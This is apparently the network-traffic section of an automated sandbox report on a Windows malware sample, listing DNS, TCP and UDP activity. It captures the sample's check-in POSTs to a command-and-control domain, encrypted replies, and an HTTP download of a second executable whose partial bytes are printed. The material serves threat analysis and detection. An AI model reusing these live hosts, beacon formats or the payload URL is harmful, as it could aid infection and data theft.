Dec 26, 2024 14:16:05.119015932 CET	443	49846	142.250.181.68	192.168.2.8
Dec 26, 2024 14:16:05.119112015 CET	49846	443	192.168.2.8	142.250.181.68
Dec 26, 2024 14:16:05.119369984 CET	49846	443	192.168.2.8	142.250.181.68
Dec 26, 2024 14:16:05.119381905 CET	443	49846	142.250.181.68	192.168.2.8
Dec 26, 2024 14:16:06.910511017 CET	443	49846	142.250.181.68	192.168.2.8
Dec 26, 2024 14:16:06.911629915 CET	49846	443	192.168.2.8	142.250.181.68
Dec 26, 2024 14:16:06.911660910 CET	443	49846	142.250.181.68	192.168.2.8
Dec 26, 2024 14:16:06.912000895 CET	443	49846	142.250.181.68	192.168.2.8
Dec 26, 2024 14:16:06.912432909 CET	49846	443	192.168.2.8	142.250.181.68
Dec 26, 2024 14:16:06.912497997 CET	443	49846	142.250.181.68	192.168.2.8
Dec 26, 2024 14:16:06.955607891 CET	49846	443	192.168.2.8	142.250.181.68
Dec 26, 2024 14:16:16.586513996 CET	443	49846	142.250.181.68	192.168.2.8
Dec 26, 2024 14:16:16.586572886 CET	443	49846	142.250.181.68	192.168.2.8
Dec 26, 2024 14:16:16.586626053 CET	49846	443	192.168.2.8	142.250.181.68
Dec 26, 2024 14:16:16.970951080 CET	49846	443	192.168.2.8	142.250.181.68
Dec 26, 2024 14:16:16.970979929 CET	443	49846	142.250.181.68	192.168.2.8

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 26, 2024 14:14:23.982012987 CET	57099	53	192.168.2.8	1.1.1.1
Dec 26, 2024 14:14:24.119847059 CET	53	57099	1.1.1.1	192.168.2.8
Dec 26, 2024 14:15:01.021523952 CET	53	53348	1.1.1.1	192.168.2.8
Dec 26, 2024 14:15:01.118026972 CET	53	56844	1.1.1.1	192.168.2.8
Dec 26, 2024 14:15:04.114778996 CET	53	57805	1.1.1.1	192.168.2.8
Dec 26, 2024 14:15:04.154783010 CET	138	138	192.168.2.8	192.168.2.255
Dec 26, 2024 14:15:05.065190077 CET	58542	53	192.168.2.8	1.1.1.1
Dec 26, 2024 14:15:05.065629005 CET	57454	53	192.168.2.8	1.1.1.1
Dec 26, 2024 14:15:05.202254057 CET	53	58542	1.1.1.1	192.168.2.8
Dec 26, 2024 14:15:05.202812910 CET	53	57454	1.1.1.1	192.168.2.8
Dec 26, 2024 14:15:08.688276052 CET	62652	53	192.168.2.8	1.1.1.1
Dec 26, 2024 14:15:08.688468933 CET	54645	53	192.168.2.8	1.1.1.1
Dec 26, 2024 14:15:16.980145931 CET	51299	53	192.168.2.8	1.1.1.1
Dec 26, 2024 14:15:16.980313063 CET	53637	53	192.168.2.8	1.1.1.1
Dec 26, 2024 14:15:17.270690918 CET	53	65065	1.1.1.1	192.168.2.8
Dec 26, 2024 14:15:21.402288914 CET	53	56715	1.1.1.1	192.168.2.8
Dec 26, 2024 14:15:40.406814098 CET	53	52485	1.1.1.1	192.168.2.8
Dec 26, 2024 14:16:00.410130024 CET	53	61232	1.1.1.1	192.168.2.8
Dec 26, 2024 14:16:02.818542004 CET	53	58779	1.1.1.1	192.168.2.8
Dec 26, 2024 14:16:16.971376896 CET	62484	53	192.168.2.8	1.1.1.1
Dec 26, 2024 14:16:16.971638918 CET	61666	53	192.168.2.8	1.1.1.1

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Dec 26, 2024 14:15:04.009174109 CET	192.168.2.8	1.1.1.1	c2e7	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 26, 2024 14:14:23.982012987 CET	192.168.2.8	1.1.1.1	0x560f	Standard query (0)	mindhandru.buzz	A (IP address)	IN (0x0001)	false
Dec 26, 2024 14:15:05.065190077 CET	192.168.2.8	1.1.1.1	0x91fd	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Dec 26, 2024 14:15:05.065629005 CET	192.168.2.8	1.1.1.1	0x959c	Standard query (0)	www.google.com	65	IN (0x0001)	false
Dec 26, 2024 14:15:08.688276052 CET	192.168.2.8	1.1.1.1	0xfcf4	Standard query (0)	js.monitor.azure.com	A (IP address)	IN (0x0001)	false
Dec 26, 2024 14:15:08.688468933 CET	192.168.2.8	1.1.1.1	0x67f8	Standard query (0)	js.monitor.azure.com	65	IN (0x0001)	false
Dec 26, 2024 14:15:16.980145931 CET	192.168.2.8	1.1.1.1	0xdbc9	Standard query (0)	mdec.nelreports.net	A (IP address)	IN (0x0001)	false
Dec 26, 2024 14:15:16.980313063 CET	192.168.2.8	1.1.1.1	0x1f52	Standard query (0)	mdec.nelreports.net	65	IN (0x0001)	false
Dec 26, 2024 14:16:16.971376896 CET	192.168.2.8	1.1.1.1	0xfda7	Standard query (0)	mdec.nelreports.net	A (IP address)	IN (0x0001)	false
Dec 26, 2024 14:16:16.971638918 CET	192.168.2.8	1.1.1.1	0x9c57	Standard query (0)	mdec.nelreports.net	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 26, 2024 14:14:24.119847059 CET	1.1.1.1	192.168.2.8	0x560f	No error (0)	mindhandru.buzz		104.21.11.101	A (IP address)	IN (0x0001)	false
Dec 26, 2024 14:14:24.119847059 CET	1.1.1.1	192.168.2.8	0x560f	No error (0)	mindhandru.buzz		172.67.165.185	A (IP address)	IN (0x0001)	false
Dec 26, 2024 14:15:05.202254057 CET	1.1.1.1	192.168.2.8	0x91fd	No error (0)	www.google.com		142.250.181.68	A (IP address)	IN (0x0001)	false
Dec 26, 2024 14:15:05.202812910 CET	1.1.1.1	192.168.2.8	0x959c	No error (0)	www.google.com			65	IN (0x0001)	false
Dec 26, 2024 14:15:08.832717896 CET	1.1.1.1	192.168.2.8	0xfcf4	No error (0)	js.monitor.azure.com	aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 14:15:08.832717896 CET	1.1.1.1	192.168.2.8	0xfcf4	No error (0)	aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net	star-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 14:15:08.832717896 CET	1.1.1.1	192.168.2.8	0xfcf4	No error (0)	shed.dual-low.s-part-0035.t-0009.t-msedge.net	s-part-0035.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 14:15:08.832717896 CET	1.1.1.1	192.168.2.8	0xfcf4	No error (0)	s-part-0035.t-0009.t-msedge.net		13.107.246.63	A (IP address)	IN (0x0001)	false
Dec 26, 2024 14:15:08.832739115 CET	1.1.1.1	192.168.2.8	0x67f8	No error (0)	js.monitor.azure.com	aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 14:15:08.832739115 CET	1.1.1.1	192.168.2.8	0x67f8	No error (0)	aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net	star-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 14:15:09.101716995 CET	1.1.1.1	192.168.2.8	0x11f3	No error (0)	consentdeliveryfd.azurefd.net	firstparty-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 14:15:09.188630104 CET	1.1.1.1	192.168.2.8	0x98eb	No error (0)	consentdeliveryfd.azurefd.net	firstparty-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 14:15:09.188630104 CET	1.1.1.1	192.168.2.8	0x98eb	No error (0)	shed.dual-low.s-part-0035.t-0009.t-msedge.net	s-part-0035.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 14:15:09.188630104 CET	1.1.1.1	192.168.2.8	0x98eb	No error (0)	s-part-0035.t-0009.t-msedge.net		13.107.246.63	A (IP address)	IN (0x0001)	false
Dec 26, 2024 14:15:12.483967066 CET	1.1.1.1	192.168.2.8	0xf088	No error (0)	consentdeliveryfd.azurefd.net	firstparty-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 14:15:12.484937906 CET	1.1.1.1	192.168.2.8	0x95f9	No error (0)	consentdeliveryfd.azurefd.net	firstparty-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 14:15:12.484937906 CET	1.1.1.1	192.168.2.8	0x95f9	No error (0)	shed.dual-low.s-part-0035.t-0009.t-msedge.net	s-part-0035.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 14:15:12.484937906 CET	1.1.1.1	192.168.2.8	0x95f9	No error (0)	s-part-0035.t-0009.t-msedge.net		13.107.246.63	A (IP address)	IN (0x0001)	false
Dec 26, 2024 14:15:17.212120056 CET	1.1.1.1	192.168.2.8	0xdbc9	No error (0)	mdec.nelreports.net	mdec.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 14:15:17.215429068 CET	1.1.1.1	192.168.2.8	0x1f52	No error (0)	mdec.nelreports.net	mdec.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 14:16:17.109344006 CET	1.1.1.1	192.168.2.8	0x9c57	No error (0)	mdec.nelreports.net	mdec.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 14:16:17.202641010 CET	1.1.1.1	192.168.2.8	0xfda7	No error (0)	mdec.nelreports.net	mdec.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false

HTTP Request Dependency Graph

mindhandru.buzz

https:

js.monitor.azure.com

185.215.113.16

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49715	185.215.113.16	80	1868	C:\Users\user\Desktop\0zBsv1tnt4.exe

Timestamp	Bytes transferred	Direction	Data
Dec 26, 2024 14:14:48.768763065 CET	200	OUT	GET /off/def.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16
Dec 26, 2024 14:14:50.201829910 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Dec 2024 13:14:49 GMT Content-Type: application/octet-stream Content-Length: 2868736 Last-Modified: Thu, 26 Dec 2024 12:23:49 GMT Connection: keep-alive ETag: "676d4ad5-2bc600" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 00 2c 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 2c 00 00 04 00 00 05 73 2c 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 44 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$, `@ @,s,`Ui`D @ @ @.rsrcD``@.idata f@jqdliiod@+8+h@gsuquyrh ++@.taggant@,"+@
Dec 26, 2024 14:14:50.201875925 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 26, 2024 14:14:50.201889038 CET	448	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 26, 2024 14:14:50.201910973 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 26, 2024 14:14:50.201925039 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 26, 2024 14:14:50.201936960 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 26, 2024 14:14:50.201948881 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 26, 2024 14:14:50.202153921 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 26, 2024 14:14:50.202166080 CET	1236	IN	Data Raw: b8 b3 88 b7 ba d5 ae 91 dc d6 a0 91 dc d7 84 9e dc 02 bf 91 e6 d5 84 91 dc d5 84 91 dc 1b cb 91 df e9 84 91 dd f0 b4 94 dc 6b 86 91 dc d5 84 91 dc fd 90 91 dc db ac 9e dc d5 8a b9 ea d5 84 97 04 e4 84 91 e2 47 ba 91 dc 45 ad a1 dc d5 8a 03 26 d5 Data Ascii: kGE&OxLGJEOLGEOLGEOLGEOLGEO;LGE*OoLGEO>LGEp
Dec 26, 2024 14:14:50.202176094 CET	1236	IN	Data Raw: dd 2b 05 4e de f4 85 e7 5c 96 87 b0 dd db 8a bb e0 e5 85 e7 5c 41 85 b4 dd 2b 05 6c de f8 85 e7 5c 7b 86 b4 dd 2b 05 04 e0 f8 85 e7 5c fe 87 b4 dd 2b 05 58 e0 f8 85 e7 5c 36 87 b4 dd 2b 05 13 de f8 85 e7 5c 30 86 b4 dd 2b 05 bd de f8 85 e7 5c 83 Data Ascii: +N\\A+l\{+\+X\6+\0+\\>+\d+\-+d\%+*\+\o+N\{+p$kx%\|[8
Dec 26, 2024 14:14:50.321829081 CET	1236	IN	Data Raw: dc 57 86 bf dc e8 84 1c de 03 85 ac dc 7f 86 bf dc f8 84 44 de 03 85 bc dc 94 86 bf dc 08 85 50 de 03 85 cc dc 94 86 bf dc 18 85 44 de 03 85 dc dc 9a 86 bf dc 28 85 50 de 03 85 ec dc 94 86 bf dc 38 85 6e de 03 85 fc dc dc 86 bf dc 48 85 a5 de 18 Data Ascii: WDPD(P8nH\|88\|883t`8\|`8\|*j3 ^&\

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49704	104.21.11.101	443	1868	C:\Users\user\Desktop\0zBsv1tnt4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-26 13:14:25 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: mindhandru.buzz
2024-12-26 13:14:25 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-26 13:14:26 UTC	1126	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 13:14:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=klhjmpmordkdpgpo8q5fr6305h; expires=Mon, 21 Apr 2025 07:01:05 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JZcCbcJkSXJeppSD1GkVPwb%2FGPfNtF9a%2BW96UUv2N1yZRrJN4VqaOhTWGnrPLTLONR%2FqZIER3CTG7fhmTJN40Hm9oyGz0yqtESelyWQZZfJ%2BOYElYcDJXchXkc45FSkUyPQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f815576cbe95e68-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1586&min_rtt=1580&rtt_var=605&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=906&delivery_rate=1791411&cwnd=214&unsent_bytes=0&cid=3c0f473524705575&ts=1033&x=0"
2024-12-26 13:14:26 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-26 13:14:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49705	104.21.11.101	443	1868	C:\Users\user\Desktop\0zBsv1tnt4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-26 13:14:27 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 53 Host: mindhandru.buzz
2024-12-26 13:14:27 UTC	53	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
2024-12-26 13:14:28 UTC	1122	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 13:14:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=sifd7eukrg4rle66n8s1i80l9u; expires=Mon, 21 Apr 2025 07:01:07 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zd1xQMHQ8uGXVfTvpFE0PZ6NUwXsRrbjB6KbeKzclV7NyMrg42F38U5GuoeYQxko%2BLJKTMRrmdNHgsTqWNxrXR9sKXz%2FoywEN%2BRv0Uvk5AK9QQGqYm56WgVe3Eue3aQF1u4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8155859bb978d9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1740&min_rtt=1735&rtt_var=662&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2838&recv_bytes=952&delivery_rate=1640449&cwnd=32&unsent_bytes=0&cid=92e640c141783c9f&ts=934&x=0"
2024-12-26 13:14:28 UTC	247	IN	Data Raw: 63 34 36 0d 0a 74 6c 45 45 79 54 78 68 6c 51 78 4c 68 54 56 6d 39 6e 63 2f 59 51 6a 77 68 61 73 66 6f 47 57 56 6f 4b 56 5a 32 35 57 2b 38 57 58 4e 63 33 4c 72 42 6c 57 35 4c 6a 6a 67 46 31 79 43 42 55 6f 45 4a 4e 4c 6b 7a 7a 32 61 41 2f 54 4d 31 6a 7a 33 74 38 69 63 52 34 77 33 5a 61 56 50 42 4c 6b 75 4c 76 30 58 58 4b 30 4d 48 51 52 6d 30 72 2b 4a 65 73 6f 48 39 4d 7a 48 4f 4c 44 36 7a 70 30 47 33 6a 31 6a 6f 56 6b 43 38 57 30 6e 36 46 41 44 6b 78 5a 56 44 32 47 64 37 63 59 39 6a 45 66 77 32 6f 64 6a 2b 64 6a 62 68 51 54 37 4d 48 65 69 48 68 79 35 64 32 6e 67 57 30 54 4d 56 56 34 45 61 70 7a 6a 7a 33 54 49 44 66 33 45 78 6a 32 78 35 64 65 58 44 64 34 7a 59 4b 42 54 43 2b 56 67 4c 65 39 62 42 5a 6b 57 48 55 30 71 6c 66 2b 4a 4a 59 Data Ascii: c46tlEEyTxhlQxLhTVm9nc/YQjwhasfoGWVoKVZ25W+8WXNc3LrBlW5LjjgF1yCBUoEJNLkzz2aA/TM1jz3t8icR4w3ZaVPBLkuLv0XXK0MHQRm0r+JesoH9MzHOLD6zp0G3j1joVkC8W0n6FADkxZVD2Gd7cY9jEfw2odj+djbhQT7MHeiHhy5d2ngW0TMVV4Eapzjz3TIDf3Exj2x5deXDd4zYKBTC+VgLe9bBZkWHU0qlf+JJY
2024-12-26 13:14:28 UTC	1369	IN	Data Raw: 4a 55 78 63 48 57 4b 71 7a 36 7a 4a 56 48 79 33 31 2f 36 31 6b 50 74 7a 5a 70 37 31 73 4b 6b 52 5a 53 42 47 75 53 39 63 5a 39 77 51 2f 2f 78 73 30 30 74 76 6a 53 6d 51 44 63 4f 6d 47 6b 57 51 76 78 59 53 71 6e 47 55 53 54 44 52 31 62 4b 72 4c 33 79 6e 37 57 43 75 61 43 32 48 57 67 74 39 75 66 52 34 78 7a 59 4b 56 66 44 76 64 38 49 65 78 63 41 59 59 65 56 41 35 6e 6b 75 72 44 63 73 45 48 38 4d 6a 4e 4e 4c 50 7a 30 5a 34 42 31 44 4d 6d 35 52 34 45 37 79 35 78 70 33 51 42 68 42 4a 52 46 53 69 6f 70 39 59 7a 32 30 66 77 7a 6f 64 6a 2b 66 2f 5a 6b 41 54 66 50 47 57 6a 56 52 48 33 66 43 2f 71 55 68 61 53 45 46 4d 4a 61 59 44 74 78 33 76 42 44 76 7a 4c 77 6a 79 39 74 35 4c 54 41 4d 78 7a 50 75 74 2f 44 76 78 69 49 2f 42 58 52 49 74 62 52 45 4e 74 6e 71 65 52 50 Data Ascii: JUxcHWKqz6zJVHy31/61kPtzZp71sKkRZSBGuS9cZ9wQ//xs00tvjSmQDcOmGkWQvxYSqnGUSTDR1bKrL3yn7WCuaC2HWgt9ufR4xzYKVfDvd8IexcAYYeVA5nkurDcsEH8MjNNLPz0Z4B1DMm5R4E7y5xp3QBhBJRFSiop9Yz20fwzodj+f/ZkATfPGWjVRH3fC/qUhaSEFMJaYDtx3vBDvzLwjy9t5LTAMxzPut/DvxiI/BXRItbRENtnqeRP
2024-12-26 13:14:28 UTC	1369	IN	Data Raw: 43 69 58 75 2b 37 35 7a 4c 52 2f 34 77 63 71 68 55 51 63 4a 74 4a 2b 6c 51 45 74 51 4b 45 78 6f 71 6c 65 75 4a 4a 59 49 4b 39 73 72 42 4b 62 62 36 33 35 30 4a 32 7a 5a 70 6f 31 34 44 2b 6d 73 74 37 46 77 48 6d 52 46 50 43 57 71 61 34 73 68 33 79 45 65 35 67 73 41 6a 2b 61 2b 63 6f 68 44 66 63 56 4f 6f 55 41 33 77 65 47 6e 34 47 52 33 55 45 6c 46 44 4d 74 4c 71 77 58 6a 48 43 50 62 49 79 54 36 7a 2b 39 53 64 42 4d 59 38 59 71 74 53 43 2f 31 6a 4a 2b 4e 66 44 5a 38 65 57 77 4e 72 6d 4b 65 48 50 63 55 66 74 35 71 48 44 37 37 37 30 5a 78 46 34 54 42 6f 70 56 6b 56 74 33 46 6e 2f 68 63 44 6d 46 55 46 51 32 61 62 35 38 4a 33 78 67 66 77 7a 38 49 34 76 76 54 52 6c 41 33 61 4e 47 4b 6e 56 77 37 78 62 69 37 6a 55 68 61 52 48 46 45 50 4b 74 79 6e 7a 6d 57 43 58 37 Data Ascii: CiXu+75zLR/4wcqhUQcJtJ+lQEtQKExoqleuJJYIK9srBKbb6350J2zZpo14D+mst7FwHmRFPCWqa4sh3yEe5gsAj+a+cohDfcVOoUA3weGn4GR3UElFDMtLqwXjHCPbIyT6z+9SdBMY8YqtSC/1jJ+NfDZ8eWwNrmKeHPcUft5qHD7770ZxF4TBopVkVt3Fn/hcDmFUFQ2ab58J3xgfwz8I4vvTRlA3aNGKnVw7xbi7jUhaRHFEPKtynzmWCX7
2024-12-26 13:14:28 UTC	164	IN	Data Raw: 2b 61 2b 63 6d 67 37 47 50 57 69 69 55 77 58 2f 61 53 66 71 58 41 4b 66 45 6c 6f 46 5a 35 72 71 7a 48 37 44 41 2f 33 51 78 44 43 7a 2b 74 62 54 53 5a 51 30 66 75 73 47 51 39 42 69 41 50 64 4d 46 6f 4a 56 51 6b 31 7a 30 75 44 46 50 5a 70 48 39 4d 33 4f 4e 4c 48 2f 30 35 77 44 32 6a 56 67 70 6c 73 4d 2f 58 77 68 36 56 6f 50 6d 78 35 50 41 32 65 57 36 38 31 31 79 51 32 33 6a 49 63 38 6f 62 65 45 30 7a 4c 5a 50 47 61 6f 53 45 50 6f 49 44 43 6e 55 41 6a 55 54 52 30 50 5a 4a 4c 6f 78 58 0d 0a Data Ascii: +a+cmg7GPWiiUwX/aSfqXAKfEloFZ5rqzH7DA/3QxDCz+tbTSZQ0fusGQ9BiAPdMFoJVQk1z0uDFPZpH9M3ONLH/05wD2jVgplsM/Xwh6VoPmx5PA2eW6811yQ23jIc8obeE0zLZPGaoSEPoIDCnUAjUTR0PZJLoxX
2024-12-26 13:14:28 UTC	1369	IN	Data Raw: 33 63 64 36 0d 0a 48 4a 44 2f 62 4f 79 54 79 38 2f 74 53 62 46 64 55 33 62 71 70 51 44 50 5a 71 4c 4f 4a 54 41 35 41 54 55 6b 4d 6b 30 75 44 52 50 5a 70 48 32 4f 58 79 65 5a 6a 4e 6e 49 78 4a 7a 58 4e 68 70 78 35 62 74 32 49 71 36 31 38 4c 6b 68 78 52 43 57 4f 5a 36 38 4a 35 7a 67 37 79 78 4d 59 2b 76 50 62 59 6e 77 33 53 4d 47 57 6b 55 51 7a 2f 4c 6d 65 6e 55 42 7a 55 54 52 30 6d 66 5a 6e 70 7a 7a 33 64 53 65 36 43 77 44 66 35 72 35 79 66 44 74 49 31 59 36 64 66 42 66 39 72 49 65 4e 57 41 70 49 57 55 67 64 76 6b 2b 6a 4e 63 63 77 4e 39 73 50 4c 4d 4c 62 38 32 64 4e 4a 6c 44 52 2b 36 77 5a 44 78 6d 30 2f 38 45 63 49 31 41 6f 54 47 69 71 56 36 34 6b 6c 67 67 62 6c 79 4d 30 31 76 50 6a 5a 6b 41 6a 54 50 6d 43 6e 56 41 72 2f 61 43 62 75 52 51 65 59 47 31 6f Data Ascii: 3cd6HJD/bOyTy8/tSbFdU3bqpQDPZqLOJTA5ATUkMk0uDRPZpH2OXyeZjNnIxJzXNhpx5bt2Iq618LkhxRCWOZ68J5zg7yxMY+vPbYnw3SMGWkUQz/LmenUBzUTR0mfZnpzz3dSe6CwDf5r5yfDtI1Y6dfBf9rIeNWApIWUgdvk+jNccwN9sPLMLb82dNJlDR+6wZDxm0/8EcI1AoTGiqV64klggblyM01vPjZkAjTPmCnVAr/aCbuRQeYG1o
